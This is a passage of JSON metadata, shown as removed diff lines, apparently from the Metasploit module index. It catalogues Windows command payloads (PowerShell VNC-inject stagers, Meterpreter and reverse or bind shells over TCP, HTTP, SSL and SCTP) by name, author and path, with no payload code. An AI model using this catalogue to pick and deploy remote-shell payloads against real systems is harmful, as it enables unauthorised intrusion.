- "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_http": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_https": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp": { - "name": "Powershell Exec, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4": { - "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid": { - "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttp": { - "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttps": { - "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/powershell_bind_tcp": { - "name": "Windows Interactive Powershell Session, Bind TCP", - "fullname": "payload/cmd/windows/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell_reverse_tcp": { - "name": "Windows Interactive Powershell Session, Reverse TCP", - "fullname": "payload/cmd/windows/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell_reverse_tcp_ssl": { - "name": "Windows Interactive Powershell Session, Reverse TCP SSL", - "fullname": "payload/cmd/windows/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Turner", - "Dave Hardy" - ], - "description": "Interacts with a powershell session on an established SSL socket connection", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-11-04 00:33:03 +0000", - "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/python/exec": { - "name": "Python Exec, Python Execute Command", - "fullname": "payload/cmd/windows/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/exec", - "staged": false - }, - "payload_cmd/windows/python/meterpreter/bind_tcp": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_cmd/windows/python/meterpreter/reverse_http": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_http", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_cmd/windows/python/meterpreter/reverse_https": { - "name": "Python Exec, Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_https", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - "payload_cmd/windows/python/meterpreter/reverse_tcp": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_cmd/windows/python/meterpreter/reverse_tcp_ssl": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp_ssl", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_cmd/windows/python/meterpreter/reverse_tcp_uuid": { - "name": "Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_cmd/windows/python/meterpreter_bind_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_http": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_https": { - "name": "Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/cmd/windows/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/python/meterpreter_reverse_tcp": { - "name": "Python Exec, Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/python/pingback_bind_tcp": { - "name": "Python Exec, Python Pingback, Bind TCP (via python)", - "fullname": "payload/cmd/windows/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/pingback_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/pingback_reverse_tcp": { - "name": "Python Exec, Python Pingback, Reverse TCP (via python)", - "fullname": "payload/cmd/windows/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "asoto-r7" - ], - "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_bind_tcp": { - "name": "Python Exec, Command Shell, Bind TCP (via python)", - "fullname": "payload/cmd/windows/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "mumbai" - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_sctp": { - "name": "Python Exec, Command Shell, Reverse SCTP (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_sctp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_tcp": { - "name": "Python Exec, Command Shell, Reverse TCP (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_tcp_ssl": { - "name": "Python Exec, Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/cmd/windows/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "RageLtMan " - ], - "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-01-20 14:53:59 +0000", - "path": "/modules/payloads/adapters/cmd/windows/python.rb", - "is_install_path": true, - "ref_name": "cmd/windows/python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/python", - "adapted_refname": "python/shell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/python/shell_reverse_udp": { - "name": "Python Exec, Command Shell, Reverse UDP (via python)", - "fullname": 